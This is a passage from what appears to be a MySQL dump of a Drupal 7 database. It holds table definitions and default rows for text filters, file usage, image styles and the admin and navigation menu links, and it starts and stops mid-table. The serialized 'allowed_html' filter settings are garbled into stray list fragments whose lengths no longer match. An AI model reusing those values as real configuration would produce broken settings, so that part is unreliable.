`field_image_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.', PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_image_fid` (`field_image_fid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 4 (field_image)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_revision_field_image` -- LOCK TABLES `dpl_field_revision_field_image` WRITE; /*!40000 ALTER TABLE `dpl_field_revision_field_image` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_field_revision_field_image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_revision_field_tags` -- DROP TABLE IF EXISTS `dpl_field_revision_field_tags`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_field_revision_field_tags` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_tags_tid` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_tags_tid` (`field_tags_tid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 3 (field_tags)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_field_revision_field_tags` -- LOCK TABLES `dpl_field_revision_field_tags` WRITE; /*!40000 ALTER TABLE `dpl_field_revision_field_tags` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_field_revision_field_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_file_managed` -- DROP TABLE IF EXISTS `dpl_file_managed`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_file_managed` ( `fid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'File ID.', `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid of the user who is associated with the file.', `filename` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the file with no path components. This may differ from the basename of the URI if the file is renamed to avoid overwriting an existing file.', `uri` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '' COMMENT 'The URI to access the file (either local or remote).', `filemime` varchar(255) NOT NULL DEFAULT '' COMMENT 'The file’s MIME type.', `filesize` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT 'The size of the file in bytes.', `status` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A field indicating the status of the file. Two status are defined in core: temporary (0) and permanent (1). Temporary files older than DRUPAL_MAXIMUM_TEMP_FILE_AGE will be removed during a cron run.', `timestamp` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'UNIX timestamp for when the file was added.', PRIMARY KEY (`fid`), UNIQUE KEY `uri` (`uri`), KEY `uid` (`uid`), KEY `status` (`status`), KEY `timestamp` (`timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores information for uploaded files.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_file_managed` -- LOCK TABLES `dpl_file_managed` WRITE; /*!40000 ALTER TABLE `dpl_file_managed` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_file_managed` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_file_usage` -- DROP TABLE IF EXISTS `dpl_file_usage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_file_usage` ( `fid` int(10) unsigned NOT NULL COMMENT 'File ID.', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the module that is using the file.', `type` varchar(64) NOT NULL DEFAULT '' COMMENT 'The name of the object type in which the file is used.', `id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The primary key of the object using the file.', `count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The number of times this file is used by this object.', PRIMARY KEY (`fid`,`type`,`id`,`module`), KEY `type_id` (`type`,`id`), KEY `fid_count` (`fid`,`count`), KEY `fid_module` (`fid`,`module`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Track where a file is used.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_file_usage` -- LOCK TABLES `dpl_file_usage` WRITE; /*!40000 ALTER TABLE `dpl_file_usage` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_file_usage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_filter` -- DROP TABLE IF EXISTS `dpl_filter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_filter` ( `format` varchar(255) NOT NULL COMMENT 'Foreign key: The dpl_filter_format.format to which this filter is assigned.', `module` varchar(64) NOT NULL DEFAULT '' COMMENT 'The origin module of the filter.', `name` varchar(32) NOT NULL DEFAULT '' COMMENT 'Name of the filter being referenced.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Weight of filter within format.', `status` int(11) NOT NULL DEFAULT '0' COMMENT 'Filter enabled status. (1 = enabled, 0 = disabled)', `settings` longblob COMMENT 'A serialized array of name value pairs that store the filter settings for the specific format.', PRIMARY KEY (`format`,`name`), KEY `list` (`weight`,`module`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Table that maps filters (HTML corrector) to text formats ...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_filter` -- LOCK TABLES `dpl_filter` WRITE; /*!40000 ALTER TABLE `dpl_filter` DISABLE KEYS */; INSERT INTO `dpl_filter` VALUES ('filtered_html','filter','filter_autop',2,1,'a:0:{}'),('filtered_html','filter','filter_html',1,1,'a:3:{s:12:\"allowed_html\";s:74:\"
                                  1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('filtered_html','filter','filter_htmlcorrector',10,1,'a:0:{}'),('filtered_html','filter','filter_html_escape',-10,0,'a:0:{}'),('filtered_html','filter','filter_url',0,1,'a:1:{s:17:\"filter_url_length\";i:72;}'),('full_html','filter','filter_autop',1,1,'a:0:{}'),('full_html','filter','filter_html',-10,0,'a:3:{s:12:\"allowed_html\";s:74:\"
                                      1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('full_html','filter','filter_htmlcorrector',10,1,'a:0:{}'),('full_html','filter','filter_html_escape',-10,0,'a:0:{}'),('full_html','filter','filter_url',0,1,'a:1:{s:17:\"filter_url_length\";i:72;}'),('plain_text','filter','filter_autop',2,1,'a:0:{}'),('plain_text','filter','filter_html',-10,0,'a:3:{s:12:\"allowed_html\";s:74:\"
                                          1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('plain_text','filter','filter_htmlcorrector',10,0,'a:0:{}'),('plain_text','filter','filter_html_escape',0,1,'a:0:{}'),('plain_text','filter','filter_url',1,1,'a:1:{s:17:\"filter_url_length\";i:72;}'); /*!40000 ALTER TABLE `dpl_filter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_filter_format` -- DROP TABLE IF EXISTS `dpl_filter_format`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_filter_format` ( `format` varchar(255) NOT NULL COMMENT 'Primary Key: Unique machine name of the format.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the text format (Filtered HTML).', `cache` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate whether format is cacheable. (1 = cacheable, 0 = not cacheable)', `status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT 'The status of the text format. (1 = enabled, 0 = disabled)', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Weight of text format to use when listing.', PRIMARY KEY (`format`), UNIQUE KEY `name` (`name`), KEY `status_weight` (`status`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores text formats: custom groupings of filters, such as...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_filter_format` -- LOCK TABLES `dpl_filter_format` WRITE; /*!40000 ALTER TABLE `dpl_filter_format` DISABLE KEYS */; INSERT INTO `dpl_filter_format` VALUES ('filtered_html','Filtered HTML',1,1,0),('full_html','Full HTML',1,1,1),('plain_text','Plain text',1,1,10); /*!40000 ALTER TABLE `dpl_filter_format` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_flood` -- DROP TABLE IF EXISTS `dpl_flood`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_flood` ( `fid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Unique flood event ID.', `event` varchar(64) NOT NULL DEFAULT '' COMMENT 'Name of event (e.g. contact).', `identifier` varchar(128) NOT NULL DEFAULT '' COMMENT 'Identifier of the visitor, such as an IP address or hostname.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp of the event.', `expiration` int(11) NOT NULL DEFAULT '0' COMMENT 'Expiration timestamp. Expired events are purged on cron run.', PRIMARY KEY (`fid`), KEY `allow` (`event`,`identifier`,`timestamp`), KEY `purge` (`expiration`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Flood controls the threshold of events, such as the...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_flood` -- LOCK TABLES `dpl_flood` WRITE; /*!40000 ALTER TABLE `dpl_flood` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_flood` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_history` -- DROP TABLE IF EXISTS `dpl_history`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_history` ( `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid that read the dpl_node nid.', `nid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid that was read.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp at which the read occurred.', PRIMARY KEY (`uid`,`nid`), KEY `nid` (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='A record of which dpl_users have read which dpl_nodes.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_history` -- LOCK TABLES `dpl_history` WRITE; /*!40000 ALTER TABLE `dpl_history` DISABLE KEYS */; INSERT INTO `dpl_history` VALUES (1,5,1426503709); /*!40000 ALTER TABLE `dpl_history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_image_effects` -- DROP TABLE IF EXISTS `dpl_image_effects`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_image_effects` ( `ieid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for an image effect.', `isid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The dpl_image_styles.isid for an image style.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of the effect in the style.', `name` varchar(255) NOT NULL COMMENT 'The unique name of the effect to be executed.', `data` longblob NOT NULL COMMENT 'The configuration data for the effect.', PRIMARY KEY (`ieid`), KEY `isid` (`isid`), KEY `weight` (`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configuration options for image effects.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_image_effects` -- LOCK TABLES `dpl_image_effects` WRITE; /*!40000 ALTER TABLE `dpl_image_effects` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_image_effects` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_image_styles` -- DROP TABLE IF EXISTS `dpl_image_styles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_image_styles` ( `isid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for an image style.', `name` varchar(255) NOT NULL COMMENT 'The style machine name.', `label` varchar(255) NOT NULL DEFAULT '' COMMENT 'The style administrative name.', PRIMARY KEY (`isid`), UNIQUE KEY `name` (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configuration options for image styles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_image_styles` -- LOCK TABLES `dpl_image_styles` WRITE; /*!40000 ALTER TABLE `dpl_image_styles` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_image_styles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_menu_custom` -- DROP TABLE IF EXISTS `dpl_menu_custom`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_menu_custom` ( `menu_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique key for menu. This is used as a block delta so length is 32.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'Menu title; displayed at top of block.', `description` text COMMENT 'Menu description.', PRIMARY KEY (`menu_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Holds definitions for top-level custom menus (for example...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_menu_custom` -- LOCK TABLES `dpl_menu_custom` WRITE; /*!40000 ALTER TABLE `dpl_menu_custom` DISABLE KEYS */; INSERT INTO `dpl_menu_custom` VALUES ('main-menu','Main menu','The Main menu is used on many sites to show the major sections of the site, often in a top navigation bar.'),('management','Management','The Management menu contains links for administrative tasks.'),('navigation','Navigation','The Navigation menu contains links intended for site visitors. Links are added to the Navigation menu automatically by some modules.'),('user-menu','User menu','The User menu contains links related to the user\'s account, as well as the \'Log out\' link.'); /*!40000 ALTER TABLE `dpl_menu_custom` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_menu_links` -- DROP TABLE IF EXISTS `dpl_menu_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_menu_links` ( `menu_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'The menu name. All links with the same menu name (such as ’navigation’) are part of the same menu.', `mlid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The menu link ID (mlid) is the integer primary key.', `plid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The parent link ID (plid) is the mlid of the link above in the hierarchy, or zero if the link is at the top level in its menu.', `link_path` varchar(255) NOT NULL DEFAULT '' COMMENT 'The Drupal path or external path this link points to.', `router_path` varchar(255) NOT NULL DEFAULT '' COMMENT 'For links corresponding to a Drupal path (external = 0), this connects the link to a dpl_menu_router.path for joins.', `link_title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The text displayed for the link, which may be modified by a title callback stored in dpl_menu_router.', `options` blob COMMENT 'A serialized array of options to be passed to the url() or l() function, such as a query string or HTML attributes.', `module` varchar(255) NOT NULL DEFAULT 'system' COMMENT 'The name of the module that generated this link.', `hidden` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag for whether the link should be rendered in menus. (1 = a disabled menu item that may be shown on admin screens, -1 = a menu callback, 0 = a normal, visible link)', `external` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate if the link points to a full URL starting with a protocol, like http:// (1 = external, 0 = internal).', `has_children` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Flag indicating whether any links have this link as a parent (1 = children exist, 0 = no children).', `expanded` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Flag for whether this link should be rendered as expanded in menus - expanded links always have their child links displayed, instead of only when the link is in the active trail (1 = expanded, 0 = not expanded)', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Link weight among links in the same menu at the same depth.', `depth` smallint(6) NOT NULL DEFAULT '0' COMMENT 'The depth relative to the top level. A link with plid == 0 will have depth == 1.', `customized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate that the user has manually created or edited the link (1 = customized, 0 = not customized).', `p1` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The first mlid in the materialized path. If N = depth, then pN must equal the mlid. If depth > 1 then p(N-1) must equal the plid. All pX where X > depth must equal zero. The columns p1 .. p9 are also called the parents.', `p2` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The second mlid in the materialized path. See p1.', `p3` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The third mlid in the materialized path. See p1.', `p4` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The fourth mlid in the materialized path. See p1.', `p5` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The fifth mlid in the materialized path. See p1.', `p6` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The sixth mlid in the materialized path. See p1.', `p7` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The seventh mlid in the materialized path. See p1.', `p8` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The eighth mlid in the materialized path. See p1.', `p9` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The ninth mlid in the materialized path. See p1.', `updated` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Flag that indicates that this link was generated during the update from Drupal 5.', PRIMARY KEY (`mlid`), KEY `path_menu` (`link_path`(128),`menu_name`), KEY `menu_plid_expand_child` (`menu_name`,`plid`,`expanded`,`has_children`), KEY `menu_parents` (`menu_name`,`p1`,`p2`,`p3`,`p4`,`p5`,`p6`,`p7`,`p8`,`p9`), KEY `router_path` (`router_path`(128)) ) ENGINE=InnoDB AUTO_INCREMENT=368 DEFAULT CHARSET=utf8 COMMENT='Contains the individual links within a menu.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_menu_links` -- LOCK TABLES `dpl_menu_links` WRITE; /*!40000 ALTER TABLE `dpl_menu_links` DISABLE KEYS */; INSERT INTO `dpl_menu_links` VALUES ('management',1,0,'admin','admin','Administration','a:0:{}','system',0,0,1,0,9,1,0,1,0,0,0,0,0,0,0,0,0),('user-menu',2,0,'user','user','User account','a:1:{s:5:\"alter\";b:1;}','system',0,0,0,0,-10,1,0,2,0,0,0,0,0,0,0,0,0),('navigation',3,0,'comment/%','comment/%','Comment permalink','a:0:{}','system',0,0,1,0,0,1,0,3,0,0,0,0,0,0,0,0,0),('navigation',4,0,'filter/tips','filter/tips','Compose tips','a:0:{}','system',1,0,0,0,0,1,0,4,0,0,0,0,0,0,0,0,0),('navigation',5,0,'node/%','node/%','','a:0:{}','system',0,0,0,0,0,1,0,5,0,0,0,0,0,0,0,0,0),('navigation',6,0,'node/add','node/add','Add content','a:0:{}','system',0,0,1,0,0,1,0,6,0,0,0,0,0,0,0,0,0),('management',7,1,'admin/appearance','admin/appearance','Appearance','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}','system',0,0,0,0,-6,2,0,1,7,0,0,0,0,0,0,0,0),('management',8,1,'admin/config','admin/config','Configuration','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}','system',0,0,1,0,0,2,0,1,8,0,0,0,0,0,0,0,0),('management',9,1,'admin/content','admin/content','Content','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}','system',0,0,1,0,-10,2,0,1,9,0,0,0,0,0,0,0,0),('user-menu',10,2,'user/register','user/register','Create new account','a:0:{}','system',-1,0,0,0,0,2,0,2,10,0,0,0,0,0,0,0,0),('management',11,1,'admin/dashboard','admin/dashboard','Dashboard','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}','system',0,0,0,0,-15,2,0,1,11,0,0,0,0,0,0,0,0),('management',12,1,'admin/help','admin/help','Help','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}','system',0,0,0,0,9,2,0,1,12,0,0,0,0,0,0,0,0),('management',13,1,'admin/index','admin/index','Index','a:0:{}','system',-1,0,0,0,-18,2,0,1,13,0,0,0,0,0,0,0,0),('user-menu',14,2,'user/login','user/login','Log in','a:0:{}','system',-1,0,0,0,0,2,0,2,14,0,0,0,0,0,0,0,0),('user-menu',15,0,'user/logout','user/logout','Log out','a:0:{}','system',0,0,0,0,10,1,0,15,0,0,0,0,0,0,0,0,0),('management',16,1,'admin/modules','admin/modules','Modules','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}','system',0,0,0,0,-2,2,0,1,16,0,0,0,0,0,0,0,0),('navigation',17,0,'user/%','user/%','My account','a:0:{}','system',0,0,1,0,0,1,0,17,0,0,0,0,0,0,0,0,0),('management',18,1,'admin/people','admin/people','People','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}','system',0,0,0,0,-4,2,0,1,18,0,0,0,0,0,0,0,0),('management',19,1,'admin/reports','admin/reports','Reports','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}','system',0,0,1,0,5,2,0,1,19,0,0,0,0,0,0,0,0),('user-menu',20,2,'user/password','user/password','Request new password','a:0:{}','system',-1,0,0,0,0,2,0,2,20,0,0,0,0,0,0,0,0),('management',21,1,'admin/structure','admin/structure','Structure','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}','system',0,0,1,0,-8,2,0,1,21,0,0,0,0,0,0,0,0),('management',22,1,'admin/tasks','admin/tasks','Tasks','a:0:{}','system',-1,0,0,0,-20,2,0,1,22,0,0,0,0,0,0,0,0),('navigation',23,0,'comment/reply/%','comment/reply/%','Add new comment','a:0:{}','system',0,0,0,0,0,1,0,23,0,0,0,0,0,0,0,0,0),('navigation',24,3,'comment/%/approve','comment/%/approve','Approve','a:0:{}','system',0,0,0,0,1,2,0,3,24,0,0,0,0,0,0,0,0),('navigation',25,3,'comment/%/delete','comment/%/delete','Delete','a:0:{}','system',-1,0,0,0,2,2,0,3,25,0,0,0,0,0,0,0,0),('navigation',26,3,'comment/%/edit','comment/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,2,0,3,26,0,0,0,0,0,0,0,0),('navigation',27,0,'taxonomy/term/%','taxonomy/term/%','Taxonomy term','a:0:{}','system',0,0,0,0,0,1,0,27,0,0,0,0,0,0,0,0,0),('navigation',28,3,'comment/%/view','comment/%/view','View comment','a:0:{}','system',-1,0,0,0,-10,2,0,3,28,0,0,0,0,0,0,0,0),('management',29,18,'admin/people/create','admin/people/create','Add user','a:0:{}','system',-1,0,0,0,0,3,0,1,18,29,0,0,0,0,0,0,0),('management',30,21,'admin/structure/block','admin/structure/block','Blocks','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";}}','system',0,0,1,0,0,3,0,1,21,30,0,0,0,0,0,0,0),('navigation',31,17,'user/%/cancel','user/%/cancel','Cancel account','a:0:{}','system',0,0,1,0,0,2,0,17,31,0,0,0,0,0,0,0,0),('management',32,9,'admin/content/comment','admin/content/comment','Comments','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:59:\"List and edit site comments and the comment approval queue.\";}}','system',0,0,0,0,0,3,0,1,9,32,0,0,0,0,0,0,0),('management',33,11,'admin/dashboard/configure','admin/dashboard/configure','Configure available dashboard blocks','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Configure which blocks can be shown on the dashboard.\";}}','system',-1,0,0,0,0,3,0,1,11,33,0,0,0,0,0,0,0),('management',34,9,'admin/content/node','admin/content/node','Content','a:0:{}','system',-1,0,0,0,-10,3,0,1,9,34,0,0,0,0,0,0,0),('management',35,8,'admin/config/content','admin/config/content','Content authoring','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Settings related to formatting and authoring content.\";}}','system',0,0,1,0,-15,3,0,1,8,35,0,0,0,0,0,0,0),('management',36,21,'admin/structure/types','admin/structure/types','Content types','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";}}','system',0,0,1,0,0,3,0,1,21,36,0,0,0,0,0,0,0),('management',37,11,'admin/dashboard/customize','admin/dashboard/customize','Customize dashboard','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:25:\"Customize your dashboard.\";}}','system',-1,0,0,0,0,3,0,1,11,37,0,0,0,0,0,0,0),('navigation',38,5,'node/%/delete','node/%/delete','Delete','a:0:{}','system',-1,0,0,0,1,2,0,5,38,0,0,0,0,0,0,0,0),('management',39,8,'admin/config/development','admin/config/development','Development','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Development tools.\";}}','system',0,0,1,0,-10,3,0,1,8,39,0,0,0,0,0,0,0),('navigation',40,17,'user/%/edit','user/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,2,0,17,40,0,0,0,0,0,0,0,0),('navigation',41,5,'node/%/edit','node/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,2,0,5,41,0,0,0,0,0,0,0,0),('management',42,19,'admin/reports/fields','admin/reports/fields','Field list','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}','system',0,0,0,0,0,3,0,1,19,42,0,0,0,0,0,0,0),('management',43,7,'admin/appearance/list','admin/appearance/list','List','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:31:\"Select and configure your theme\";}}','system',-1,0,0,0,-1,3,0,1,7,43,0,0,0,0,0,0,0),('management',44,16,'admin/modules/list','admin/modules/list','List','a:0:{}','system',-1,0,0,0,0,3,0,1,16,44,0,0,0,0,0,0,0),('management',45,18,'admin/people/people','admin/people/people','List','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:50:\"Find and manage people interacting with your site.\";}}','system',-1,0,0,0,-10,3,0,1,18,45,0,0,0,0,0,0,0),('management',46,8,'admin/config/media','admin/config/media','Media','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:12:\"Media tools.\";}}','system',0,0,1,0,-10,3,0,1,8,46,0,0,0,0,0,0,0),('management',47,21,'admin/structure/menu','admin/structure/menu','Menus','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";}}','system',0,0,1,0,0,3,0,1,21,47,0,0,0,0,0,0,0),('management',48,8,'admin/config/people','admin/config/people','People','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:24:\"Configure user accounts.\";}}','system',0,0,1,0,-20,3,0,1,8,48,0,0,0,0,0,0,0),('management',49,18,'admin/people/permissions','admin/people/permissions','Permissions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}','system',-1,0,0,0,0,3,0,1,18,49,0,0,0,0,0,0,0),('management',50,19,'admin/reports/dblog','admin/reports/dblog','Recent log messages','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}','system',0,0,0,0,-1,3,0,1,19,50,0,0,0,0,0,0,0),('management',51,8,'admin/config/regional','admin/config/regional','Regional and language','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Regional settings, localization and translation.\";}}','system',0,0,1,0,-5,3,0,1,8,51,0,0,0,0,0,0,0),('navigation',52,5,'node/%/revisions','node/%/revisions','Revisions','a:0:{}','system',-1,0,1,0,2,2,0,5,52,0,0,0,0,0,0,0,0),('management',53,8,'admin/config/search','admin/config/search','Search and metadata','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"Local site search, metadata and SEO.\";}}','system',0,0,1,0,-10,3,0,1,8,53,0,0,0,0,0,0,0),('management',54,7,'admin/appearance/settings','admin/appearance/settings','Settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:46:\"Configure default and theme specific settings.\";}}','system',-1,0,0,0,20,3,0,1,7,54,0,0,0,0,0,0,0),('management',55,19,'admin/reports/status','admin/reports/status','Status report','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}','system',0,0,0,0,-60,3,0,1,19,55,0,0,0,0,0,0,0),('management',56,8,'admin/config/system','admin/config/system','System','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:37:\"General system related 